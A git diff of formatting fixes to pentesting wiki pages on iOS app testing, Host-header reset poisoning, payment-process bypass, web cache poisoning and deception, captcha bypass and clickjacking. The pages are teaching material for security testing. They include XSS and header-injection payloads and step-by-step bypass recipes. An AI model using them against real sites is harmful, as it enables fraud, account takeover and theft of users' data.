-* if the app **declares **_**custom document types**_** **by looking into **Exported/Imported UTIs **("Info" tab of the Xcode project). The list of all system declared UTIs (Uniform Type Identifiers) can be found in the [archived Apple Developer Documentation](https://developer.apple.com/library/archive/documentation/Miscellaneous/Reference/UTIRef/Articles/System-DeclaredUniformTypeIdentifiers.html#//apple_ref/doc/uid/TP40009259).
-* if the app specifies any _**document types that it can open**_ by looking into **Document Types **("Info" tab of the Xcode project). If present, they consist of name and one or more UTIs that represent the data type (e.g. "public.png" for PNG files). iOS uses this to determine if the app is eligible to open a given document (specifying Exported/Imported UTIs is not enough).
+* if the app **declares **_**custom document types**_** ** by looking into **Exported/Imported UTIs** ("Info" tab of the Xcode project). The list of all system declared UTIs (Uniform Type Identifiers) can be found in the [archived Apple Developer Documentation](https://developer.apple.com/library/archive/documentation/Miscellaneous/Reference/UTIRef/Articles/System-DeclaredUniformTypeIdentifiers.html#//apple\_ref/doc/uid/TP40009259).
+* if the app specifies any _**document types that it can open**_ by looking into **Document Types** ("Info" tab of the Xcode project). If present, they consist of name and one or more UTIs that represent the data type (e.g. "public.png" for PNG files). iOS uses this to determine if the app is eligible to open a given document (specifying Exported/Imported UTIs is not enough).
 * if the app properly _**verifies the received data**_ by looking into the implementation of [`application:openURL:options:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623112-application?language=objc) (or its deprecated version [`UIApplicationDelegate application:openURL:sourceApplication:annotation:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623073-application?language=objc)) in the app delegate.
 
 If not having the source code you can still take a look into the `Info.plist` file and search for:
@@ -66,4 +66,4 @@ For receiving items you can:
 * Observe the app behavior.
 * In addition, you could send specific malformed files and/or use a fuzzing technique.
 
-**Read how **[**here**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#dynamic-analysis-8)**.**
+**Read how** [**here**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#dynamic-analysis-8)**.**
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md
index 4a083d4b..735af72e 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md
@@ -2,13 +2,13 @@
 
 The [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) enables sharing data within an app, and from an app to other apps. There are two kinds of pasteboards:
 
-* **systemwide general pasteboard**: for sharing data with** any app**. Persistent by default across device restarts and app uninstalls (since iOS 10).
-* **custom / named pasteboards**: for sharing data **with another app** (having the same team ID as the app to share from) or with the **app itself **(they are only available in the process that creates them). Non-persistent by default (since iOS 10), that is, they exist only until the owning (creating) app quits.
+* **systemwide general pasteboard**: for sharing data with **any app**. Persistent by default across device restarts and app uninstalls (since iOS 10).
+* **custom / named pasteboards**: for sharing data **with another app** (having the same team ID as the app to share from) or with the **app itself** (they are only available in the process that creates them). Non-persistent by default (since iOS 10), that is, they exist only until the owning (creating) app quits.
 
 Some security considerations:
 
 * Users **cannot grant or deny permission** for apps to read the **pasteboard**.
-* Since iOS 9, apps [cannot access the pasteboard while in background](https://forums.developer.apple.com/thread/13760), this mitigates background pasteboard monitoring. 
+* Since iOS 9, apps [cannot access the pasteboard while in background](https://forums.developer.apple.com/thread/13760), this mitigates background pasteboard monitoring.&#x20;
 * [Apple warns about persistent named pasteboards](https://developer.apple.com/documentation/uikit/uipasteboard?language=objc) and **discourages their use**. Instead, shared containers should be used.
 * Starting in iOS 10 there is a new Handoff feature called **Universal Clipboard** that is enabled by default. It allows the **general pasteboard contents to automatically transfer between devices**. This feature can be disabled if the developer chooses to do so and it is also possible to set an expiration time and date for copied data.
 
@@ -38,7 +38,7 @@ When **monitoring** the **pasteboards**, there is several **details** that may b
 * Get the **first available pasteboard item**: e.g. for strings use `string` method. Or use any of the other methods for the [standard data types](https://developer.apple.com/documentation/uikit/uipasteboard?language=objc#1654275).
 * Get the **number of items** with `numberOfItems`.
 * Check for **existence of standard data types** with the [convenience methods](https://developer.apple.com/documentation/uikit/uipasteboard?language=objc#2107142), e.g. `hasImages`, `hasStrings`, `hasURLs` (starting in iOS 10).
-* Check for **other data types **(typically UTIs) with [`containsPasteboardTypes:inItemSet:`](https://developer.apple.com/documentation/uikit/uipasteboard/1622100-containspasteboardtypes?language=objc). You may inspect for more concrete data types like, for example an picture as public.png and public.tiff ([UTIs](http://web.archive.org/web/20190616231857/https://developer.apple.com/documentation/mobilecoreservices/uttype)) or for custom data such as com.mycompany.myapp.mytype. Remember that, in this case, only those apps that _declare knowledge_ of the type are able to understand the data written to the pasteboard. Retrieve them using [`itemSetWithPasteboardTypes:`](https://developer.apple.com/documentation/uikit/uipasteboard/1622071-itemsetwithpasteboardtypes?language=objc) and setting the corresponding UTIs.
+* Check for **other data types** (typically UTIs) with [`containsPasteboardTypes:inItemSet:`](https://developer.apple.com/documentation/uikit/uipasteboard/1622100-containspasteboardtypes?language=objc). You may inspect for more concrete data types like, for example an picture as public.png and public.tiff ([UTIs](http://web.archive.org/web/20190616231857/https://developer.apple.com/documentation/mobilecoreservices/uttype)) or for custom data such as com.mycompany.myapp.mytype. Remember that, in this case, only those apps that _declare knowledge_ of the type are able to understand the data written to the pasteboard. Retrieve them using [`itemSetWithPasteboardTypes:`](https://developer.apple.com/documentation/uikit/uipasteboard/1622071-itemsetwithpasteboardtypes?language=objc) and setting the corresponding UTIs.
 * Check for excluded or expiring items by hooking `setItems:options:` and inspecting its options for `UIPasteboardOptionLocalOnly` or `UIPasteboardOptionExpirationDate`.
 
 If only looking for strings you may want to use **objection's** command `ios pasteboard monitor`:
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md b/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md
index 4b7c94f4..d3f81070 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md
@@ -4,7 +4,7 @@ Universal links allows to **redirect users directly** to the app without passing
 Universal links are **unique**, so they **can't be claimed by other app**s because they use standard HTTP(S) links to the **website where the owner has uploaded a file to make sure that the website and the app are related**.\
 As these links uses HTTP(S) schemes, when the **app isn't installed, safari will open the link** redirecting the users to the page. These allows **apps to communicate with the app even if it isn't installed**.
 
-To create universal links it's needed to **create a JSON file called `apple-app-site-association` **with the details. Then this file needs to be **hosted in the root directory of your webserver** (e.g. [https://google.com/apple-app-site-association](https://google.com/apple-app-site-association)).\
+To create universal links it's needed to **create a JSON file called `apple-app-site-association` ** with the details. Then this file needs to be **hosted in the root directory of your webserver** (e.g. [https://google.com/apple-app-site-association](https://google.com/apple-app-site-association)).\
 For the pentester this file is very interesting as it **discloses paths**. It can even be disclosing paths of releases that haven't been published yet.
 
 ### ​**Checking the Associated Domains Entitlement**
@@ -21,7 +21,7 @@ Here's an example from Telegram's `.entitlements` file:
     </array>
 ```
 
-More detailed information can be found in the [archived Apple Developer Documentation](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2).
+More detailed information can be found in the [archived Apple Developer Documentation](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple\_ref/doc/uid/TP40016308-CH12-SW2).
 
 If you only has the compiled application you can extract the entitlements following this guide:
 
@@ -33,7 +33,7 @@ If you only has the compiled application you can extract the entitlements follow
 
 Try to retrieve the `apple-app-site-association` file from the server using the associated domains you got from the previous step. This file needs to be accessible via HTTPS, without any redirects, at `https://<domain>/apple-app-site-association` or `https://<domain>/.well-known/apple-app-site-association`.
 
-You can retrieve it yourself with your browser or use the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/). 
+You can retrieve it yourself with your browser or use the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/).&#x20;
 
 ### **Checking the Link Receiver Method**
 
@@ -61,7 +61,7 @@ func application(_ application: UIApplication, continue userActivity: NSUserActi
 
 In addition, remember that if the URL includes parameters, they should not be trusted before being carefully sanitized and validated (even when coming from trusted domain). For example, they might have been spoofed by an attacker or might include malformed data. If that is the case, the whole URL and therefore the universal link request must be discarded.
 
-The `NSURLComponents` API can be used to parse and manipulate the components of the URL. This can be also part of the method `application:continueUserActivity:restorationHandler:` itself or might occur on a separate method being called from it. The following [example](https://developer.apple.com/documentation/uikit/core_app/allowing_apps_and_websites_to_link_to_your_content/handling_universal_links#3001935) demonstrates this:
+The `NSURLComponents` API can be used to parse and manipulate the components of the URL. This can be also part of the method `application:continueUserActivity:restorationHandler:` itself or might occur on a separate method being called from it. The following [example](https://developer.apple.com/documentation/uikit/core\_app/allowing\_apps\_and\_websites\_to\_link\_to\_your\_content/handling\_universal\_links#3001935) demonstrates this:
 
 ```swift
 func application(_ application: UIApplication,
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-webviews.md b/mobile-apps-pentesting/ios-pentesting/ios-webviews.md
index a1d36298..437b8a2a 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-webviews.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-webviews.md
@@ -4,13 +4,13 @@
 
 WebViews are in-app browser components for displaying interactive **web** **content**. They can be used to embed web content directly into an app's user interface. iOS WebViews **support** **JavaScript** execution **by default**, so script injection and Cross-Site Scripting attacks can affect them.
 
-* ****[**UIWebView**](https://developer.apple.com/documentation/uikit/uiwebview)**: **UIWebView is deprecated starting on iOS 12 and should not be used. It shouldn't be used. **JavaScript cannot be disabled**.
+* ****[**UIWebView**](https://developer.apple.com/documentation/uikit/uiwebview)**:** UIWebView is deprecated starting on iOS 12 and should not be used. It shouldn't be used. **JavaScript cannot be disabled**.
 * ****[**WKWebView**](https://developer.apple.com/documentation/webkit/wkwebview): This is the appropriate choice for extending app functionality, controlling displayed content.
   * **JavaScript** is enabled by default but thanks to the **`javaScriptEnabled`** property of `WKWebView`, it **can be completely disabled**, preventing all script injection flaws.
   * The **`JavaScriptCanOpenWindowsAutomatically`** can be used to **prevent** JavaScript from **opening new windows**, such as pop-ups.
   * The **`hasOnlySecureContent`** property can be used to verify resources loaded by the WebView are retrieved through encrypted connections.
   * `WKWebView` implements out-of-process rendering, so **memory corruption bugs won't affect** the main app process.
-*   ****[**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**: **It** **should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
+*   ****[**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It **** should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
 
     * A read-only address field with a security indicator.
     * An Action ("**Share**") **button**.
@@ -82,7 +82,7 @@ In the compiled binary:
 $ rabin2 -zz ./WheresMyBrowser | grep -i "hasonlysecurecontent"
 ```
 
-You can also search in the source code or strings the string "http://". However, this doesn't necessary means that there is a mixed content issue. Learn more about mixed content in the [MDN Web Docs](https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content).
+You can also search in the source code or strings the string "http://". However, this doesn't necessary means that there is a mixed content issue. Learn more about mixed content in the [MDN Web Docs](https://developer.mozilla.org/en-US/docs/Web/Security/Mixed\_content).
 
 ### Dynamic Analysis
 
@@ -160,7 +160,7 @@ WebViews can load remote content from an endpoint, but they can also load local
 * **UIWebView**: It can use deprecated methods [`loadHTMLString:baseURL:`](https://developer.apple.com/documentation/uikit/uiwebview/1617979-loadhtmlstring?language=objc) or [`loadData:MIMEType:textEncodingName:baseURL:`](https://developer.apple.com/documentation/uikit/uiwebview/1617941-loaddata?language=objc)to load content.
 * **WKWebView**: It can use the methods  [`loadHTMLString:baseURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1415004-loadhtmlstring?language=objc) or [`loadData:MIMEType:textEncodingName:baseURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1415011-loaddata?language=objc) to load local HTML files and `loadRequest:` for web content. Typically, the local files are loaded in combination with methods including, among others: [`pathForResource:ofType:`](https://developer.apple.com/documentation/foundation/nsbundle/1410989-pathforresource), [`URLForResource:withExtension:`](https://developer.apple.com/documentation/foundation/nsbundle/1411540-urlforresource?language=objc) or [`init(contentsOf:encoding:)`](https://developer.apple.com/documentation/swift/string/3126736-init). In addition, you should also verify if the app is using the method [`loadFileURL:allowingReadAccessToURL:`](https://developer.apple.com/documentation/webkit/wkwebview/1414973-loadfileurl?language=objc). Its first parameter is `URL` and contains the URL to be loaded in the WebView, its second parameter `allowingReadAccessToURL` may contain a single file or a directory. If containing a single file, that file will be available to the WebView. However, if it contains a directory, all files on that **directory will be made available to the WebView**. Therefore, it is worth inspecting this and in case it is a directory, verifying that no sensitive data can be found inside it.
 
-If you have the source code you can search for those methods. Having the **compiled** **binary** you can also search for these methods: 
+If you have the source code you can search for those methods. Having the **compiled** **binary** you can also search for these methods:&#x20;
 
 ```bash
 $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
@@ -169,11 +169,11 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
 
 ### File Access
 
-* **UIWebView: **
+* **UIWebView:**&#x20;
   * The `file://` scheme is always enabled.
   * File access from `file://` URLs is always enabled.
   * Universal access from `file://` URLs is always enabled.
-  * If you retrieve the effective origin from a `UIWebView` where `baseURL` is also set to `nil` you will see that it is** not set to "null"**, instead you'll obtain something similar to the following: `applewebdata://5361016c-f4a0-4305-816b-65411fc1d78`0. This origin "applewebdata://" is similar to the "file://" origin as it **does not implement Same-Origin Policy** and allow access to local files and any web resources.
+  * If you retrieve the effective origin from a `UIWebView` where `baseURL` is also set to `nil` you will see that it is **not set to "null"**, instead you'll obtain something similar to the following: `applewebdata://5361016c-f4a0-4305-816b-65411fc1d78`0. This origin "applewebdata://" is similar to the "file://" origin as it **does not implement Same-Origin Policy** and allow access to local files and any web resources.
 
 {% tabs %}
 {% tab title="exfiltrate_file" %}
diff --git a/other-web-tricks.md b/other-web-tricks.md
index c7b627ec..c754a898 100644
--- a/other-web-tricks.md
+++ b/other-web-tricks.md
@@ -2,11 +2,11 @@
 
 ### Host header
 
-Several times the back-end trust the H**ost header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). 
+Several times the back-end trust the H**ost header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).&#x20;
 
 ### Session booleans
 
-Some times when you complete some verification correctly the back-end will** just add a boolean with the value "True" to a security attribute your session**. Then, a different endpoint will know if you successfully passed that check.\
+Some times when you complete some verification correctly the back-end will **just add a boolean with the value "True" to a security attribute your session**. Then, a different endpoint will know if you successfully passed that check.\
 However, if you **pass the check** and your sessions is granted that "True" value in the security attribute, you can try to **access other resources** that **depends on the same attribute** but that you **shouldn't have permissions** to access. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
 
 ### Register functionality
diff --git a/pentesting-web/bypass-payment-process.md b/pentesting-web/bypass-payment-process.md
index 75c0cc3e..5ad2d8d9 100644
--- a/pentesting-web/bypass-payment-process.md
+++ b/pentesting-web/bypass-payment-process.md
@@ -1,8 +1,8 @@
 # Bypass Payment Process
 
-1. It is preferable to choose **PayPal **or **CoinPayments **as a payment method
-2. Intercept all requests, you may find a parameter called _**Success**_ or _**Referrer **_or _**Callback**_
-3. If the value inside the parameter has a URL like this_** example.com/payment/MD5HASH**_ for example
+1. It is preferable to choose **PayPal** or **CoinPayments** as a payment method
+2. Intercept all requests, you may find a parameter called _**Success**_ or _**Referrer**_ or _**Callback**_
+3. If the value inside the parameter has a URL like this _**example.com/payment/MD5HASH**_ for example
 4. **Copy it, and open it on a new window**, you will find that your payment was successful
 
 @SalahHasoneh1
diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md
index 4bc2b33a..91893b8b 100644
--- a/pentesting-web/cache-deception.md
+++ b/pentesting-web/cache-deception.md
@@ -16,7 +16,7 @@ In order to perform a cache poisoning attack you need first to **identify ukeyed
 
 ### Identify and evaluate unkeyed inputs
 
-You could use  [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be** changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there:&#x20;
+You could use  [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there:&#x20;
 
 ```markup
 <script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
@@ -24,23 +24,23 @@ You could use  [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca
 
 ### Elicit a harmful response from the back-end server
 
-With the parameter/header identified check how it is being **sanitised **and **where **is it **getting reflected **or affecting the response from the header. Can you abuse it any any way (perform a XSS or load a JS code controlled by you? perform a DoS?...)
+With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it any any way (perform a XSS or load a JS code controlled by you? perform a DoS?...)
 
 ### Get the response cached
 
-Once you have **identified **the **page **that can be abused, which **parameter**/**header **to use and **how **to **abuse **it you need to get the page cached. Depending on the resource you are trying to get in the cache this could time more or less time and some times you just will need to be trying several seconds.\
-The header**` X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
+Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it you need to get the page cached. Depending on the resource you are trying to get in the cache this could time more or less time and some times you just will need to be trying several seconds.\
+The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
 The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`\
-Another interesting header is **`Vary`** . This header is often used to **indicate additional headers** that are treated as** part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.\
+Another interesting header is **`Vary`** . This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.\
 One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache.
 
-When caching a request, be **careful with the headers you use **because some of them could be **used unexpectedly **as **keyed **and the **victim will need to use that same header**. Always **test **a Cache Poisoning with **different browsers** to check if it's working.&#x20;
+When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.&#x20;
 
 ## Examples
 
 ### Easiest example
 
-A header like` X-Forwarded-For` is being reflected in the response unsanitized>\
+A header like `X-Forwarded-For` is being reflected in the response unsanitized>\
 You can send a basic XSS payload and poison the cache so everybody that access page will be XSSed:
 
 ```markup
@@ -63,9 +63,9 @@ Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
 
 Note that if the vulnerable cookie is very used by the users, regular requests will be cleaning the cache.
 
-### Using multiple headers to exploit web cache poisoning vulnerabilities <a href="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
+### Using multiple headers to exploit web cache poisoning vulnerabilities <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
 
-Some time you will need to **exploit several ukneyed inputs **to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If **the **server **is **forwarding **all the **HTTP **requests **to HTTPS **and using the header `X-Forwarded-Scheme` as domain name for the redirect. You can control where the pagepointed by the redirect.
+Some time you will need to **exploit several ukneyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as domain name for the redirect. You can control where the pagepointed by the redirect.
 
 ```markup
 GET /resources/js/tracking.js HTTP/1.1
@@ -93,13 +93,13 @@ Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Sm
 
 The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
 
-First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache. **Therefore, if you access w_ww.example.com/profile.php/nonexistent.js_ the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users.
+First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache.** Therefore, if you access w_ww.example.com/profile.php/nonexistent.js_ the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users.
 
 Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
 In the example it is explained that if you load a non-existent page like  _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ (**with the users sensitive information**) is going to be returned and the cache server is going to save the result.\
-Then, the **attacker **can access _http://www.example.com/home.php _and see the **confidential information** of the users that accessed before.
+Then, the **attacker** can access _http://www.example.com/home.php_ and see the **confidential information** of the users that accessed before.
 
-Note that the **cache proxy** should be **configured **to **cache **files **based **on the **extension **of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css _will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
+Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
 
 Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
 
diff --git a/pentesting-web/captcha-bypass.md b/pentesting-web/captcha-bypass.md
index eebe3e9e..e7ae5aee 100644
--- a/pentesting-web/captcha-bypass.md
+++ b/pentesting-web/captcha-bypass.md
@@ -2,16 +2,16 @@
 
 ## Captcha Bypass
 
-To **automate **the **testing **of some functions of the server that allows user input it **could **be **needed **to **bypass **a **captcha **implementation. Test these things:
+To **automate** the **testing** of some functions of the server that allows user input it **could** be **needed** to **bypass** a **captcha** implementation. Test these things:
 
 * **Do not send the parameter** related to the captcha.
   * Change from POST to GET or other HTTP Verbs
   * Change to JSON or from JSON
 * Send the **captcha parameter empty**.
-* Check if the value of the captcha is **in the source code **of the page.
+* Check if the value of the captcha is **in the source code** of the page.
 * Check if the value is **inside a cookie.**
 * Try to use an **old captcha value**
-* Check if you can use the **same **captcha **value **several times with** the same or different sessionID.**
-* If the captcha consists on a **mathematical operation **try to **automate **the **calculation.**
+* Check if you can use the **same** captcha **value** several times with **the same or different sessionID.**
+* If the captcha consists on a **mathematical operation** try to **automate** the **calculation.**
 * If the captcha consists on **read characters from an image**, check manually or with code **how many images** are being used and if only a **few images are being used, detect them by MD5.**
-* Use an **OCR **([https://github.com/tesseract-ocr/tesseract](https://github.com/tesseract-ocr/tesseract)).
+* Use an **OCR** ([https://github.com/tesseract-ocr/tesseract](https://github.com/tesseract-ocr/tesseract)).
diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md
index ac93980a..fa0bd2e2 100644
--- a/pentesting-web/clickjacking.md
+++ b/pentesting-web/clickjacking.md
@@ -2,7 +2,7 @@
 
 ## What is Clickjacking
 
-Clickjacking is an attack that **tricks **a **user** into **clicking **a webpage **element **which is **invisible **or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. (From [here](https://www.imperva.com/learn/application-security/clickjacking/)).
+Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage **element** which is **invisible** or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. (From [here](https://www.imperva.com/learn/application-security/clickjacking/)).
 
 ### Prepopulate forms trick
 
@@ -93,10 +93,10 @@ background: #F00;
 
 ### XSS + Clickjacking
 
-If you have identified a **XSS attack that requires a user to click** on some element to **trigger **the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.\
+If you have identified a **XSS attack that requires a user to click** on some element to **trigger** the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.\
 Example:\
-_You found a **self XSS** in some private details of the account (details that **only you can set and read**). The page with the **form **to set this details is **vulnerable **to **Clickjacking **and you can **prepopulate** the **form **with GET parameters._\
-__An attacker could prepared a **Clickjacking **attack to that page **prepopulating **the **form **with the **XSS payload **and **tricking **the **user **into **Submit **the form. So, **when the form is submited** and the values are modified, the **user will execute the XSS**.
+_You found a **self XSS** in some private details of the account (details that **only you can set and read**). The page with the **form** to set this details is **vulnerable** to **Clickjacking** and you can **prepopulate** the **form** with GET parameters._\
+__An attacker could prepared a **Clickjacking** attack to that page **prepopulating** the **form** with the **XSS payload** and **tricking** the **user** into **Submit** the form. So, **when the form is submited** and the values are modified, the **user will execute the XSS**.
 
 ## How to avoid Clickjacking
 
@@ -119,24 +119,24 @@ As frame busters are JavaScript then the browser's security settings may prevent
 
 Both the `allow-forms` and `allow-scripts` values permit the specified actions within the iframe but top-level navigation is disabled. This inhibits frame busting behaviours while allowing functionality within the targeted site.
 
-Depending on the type of Clickjaking attack performed** you may also need to allow**: `allow-same-origin` and `allow-modals` or [even more](https://www.w3schools.com/tags/att_iframe_sandbox.asp). When preparing the attack just check the console of the browser, it may tell you which other behaviours you need to allow.
+Depending on the type of Clickjaking attack performed **you may also need to allow**: `allow-same-origin` and `allow-modals` or [even more](https://www.w3schools.com/tags/att\_iframe\_sandbox.asp). When preparing the attack just check the console of the browser, it may tell you which other behaviours you need to allow.
 
 ### X-Frame-Options
 
-The **`X-Frame-Options` HTTP response header** can be used to indicate whether or not a browser should be **allowed **to render a page in a `<frame>` or `<iframe>`. Sites can use this to avoid Clickjacking attacks, by ensuring that **their content is not embedded into other sites**. Set the **`X-Frame-Options`** header for all responses containing HTML content. The possible values are:
+The **`X-Frame-Options` HTTP response header** can be used to indicate whether or not a browser should be **allowed** to render a page in a `<frame>` or `<iframe>`. Sites can use this to avoid Clickjacking attacks, by ensuring that **their content is not embedded into other sites**. Set the **`X-Frame-Options`** header for all responses containing HTML content. The possible values are:
 
-* `X-Frame-Options: deny` which** prevents any domain from framing the content **_(Recommended value)_
+* `X-Frame-Options: deny` which **prevents any domain from framing the content** _(Recommended value)_
 * `X-Frame-Options: sameorigin` which only **allows the current site** to frame the content.
 * `X-Frame-Options: allow-from https://trusted.com` which **permits the specified 'uri'** to frame this page.
-  * Check limitations below because** this will fail open if the browser does not support it**.
+  * Check limitations below because **this will fail open if the browser does not support it**.
   * Other browsers support the new **CSP frame-ancestors directive instead**. A few support both.
 
 ### Content Security Policy (CSP) frame-ancestors directive
 
-The** recommended clickjacking protection** is to incorporate the **`frame-ancestors` directive** in the application's Content Security Policy. \
+The **recommended clickjacking protection** is to incorporate the **`frame-ancestors` directive** in the application's Content Security Policy. \
 The **`frame-ancestors 'none'`** directive is similar in behaviour to the **X-Frame-Options `deny`** directive (_No-one can frame the page_). \
 The **`frame-ancestors 'self'`** directive is broadly equivalent to the **X-Frame-Options `sameorigin`** directive (_only current site can frame it_). \
-The **`frame-ancestors trusted.com`** directive is broadly equivalent to the **X-Frame-Options **`allow-from`directive (_only trusted site can frame it_).
+The **`frame-ancestors trusted.com`** directive is broadly equivalent to the **X-Frame-Options** `allow-from`directive (_only trusted site can frame it_).
 
 The following CSP whitelists frames to the same domain only:
 
@@ -147,7 +147,7 @@ See the following documentation for further details and more complex examples:
 * [https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors](https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors)
 * [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors)
 
-### Limitations <a href="limitations" id="limitations"></a>
+### Limitations <a href="#limitations" id="limitations"></a>
 
 * **Browser support:** CSP frame-ancestors is not supported by all the major browsers yet.
 * **X-Frame-Options takes priority:** [Section "Relation to X-Frame-Options" of the CSP Spec](https://w3c.github.io/webappsec/specs/content-security-policy/#frame-ancestors-and-frame-options) says: "_If a resource is delivered with an policy that includes a directive named frame-ancestors and whose disposition is "enforce", then the X-Frame-Options header MUST be ignored_", but Chrome 40 & Firefox 35 ignore the frame-ancestors directive and follow the X-Frame-Options header instead.
@@ -155,4 +155,4 @@ See the following documentation for further details and more complex examples:
 ## References
 
